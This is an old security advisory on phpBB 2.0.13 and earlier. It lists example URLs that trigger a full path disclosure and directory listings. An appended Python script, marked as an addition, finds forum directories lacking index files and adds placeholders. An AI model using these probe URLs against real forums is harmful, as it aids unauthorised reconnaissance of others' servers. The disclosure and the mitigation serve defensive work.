[phpbb <= 2.0.13 full path disclosure & directory listing]

Author: Jocanor
Date: 18-03-2k5

1. ----------- Introduction -----------

phpBB is a highly customizable bulletin board written in PHP.
Official page: http://www.phpbb.com

1. ----------- Full path disclosure -----------

This error is not critical, but it reveals the full path to the forum on the system.

exploit:

    http://www.example.com/db/oracle.php

    Fatal error: Cannot redeclare sql_nextid() in /www/phpbb2/db/oracle.php on line 405

2. ----------- Directory listing -----------

A default installation of phpBB has some directories with no index.* file. With this low-risk bug you can obtain information about the system, such as the HTTP daemon.

exploits:

    http://www.example.com/images/smiles/
    http://www.example.com/templates/subSilver/images/lang_english/
    http://www.example.com/docs/

3 ----------- Greetz -----------

/dev/null

4 ----------- Contact -----------

Author: Jocanor
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS

EOF.
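
Added example (not part of the original advisory, and not phpBB code): a Python audit an administrator can run against a local copy of the forum to find every directory that has no index.* file, the condition section 2 describes, and to drop an empty index.html placeholder into each. The function names and the sample tree are constructed for illustration; whether such a directory is actually listed depends on the web server's autoindex setting, which this script does not inspect.

```python
import os
import tempfile

def dirs_without_index(root):
    """Relative paths of directories under root that contain no index.* file."""
    missing = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if not any(name.lower().startswith("index.") for name in filenames):
            missing.append(os.path.relpath(dirpath, root).replace(os.sep, "/"))
    return sorted(missing)

def add_placeholder_indexes(root):
    """Write an empty index.html into each flagged directory; return what was fixed."""
    fixed = dirs_without_index(root)
    for rel in fixed:
        # Mode "x" refuses to overwrite, so an existing file is never clobbered.
        with open(os.path.join(root, rel, "index.html"), "x"):
            pass
    return fixed

# Constructed sample layout, loosely following the paths named in the advisory.
SAMPLE_FILES = [
    "index.php",
    "db/oracle.php",
    "docs/README.html",
    "images/index.htm",
    "images/smiles/icon_smile.gif",
    "templates/subSilver/images/lang_english/reply.gif",
]

def build_sample_tree(root):
    """Create the constructed sample files (empty) under root."""
    for rel in SAMPLE_FILES:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for rel in add_placeholder_indexes(root):
            print("no index file, placeholder added:", rel)
        print("still missing:", dirs_without_index(root))
```

A placeholder index file only hides the listing; turning off directory indexing in the web server covers directories created later as well.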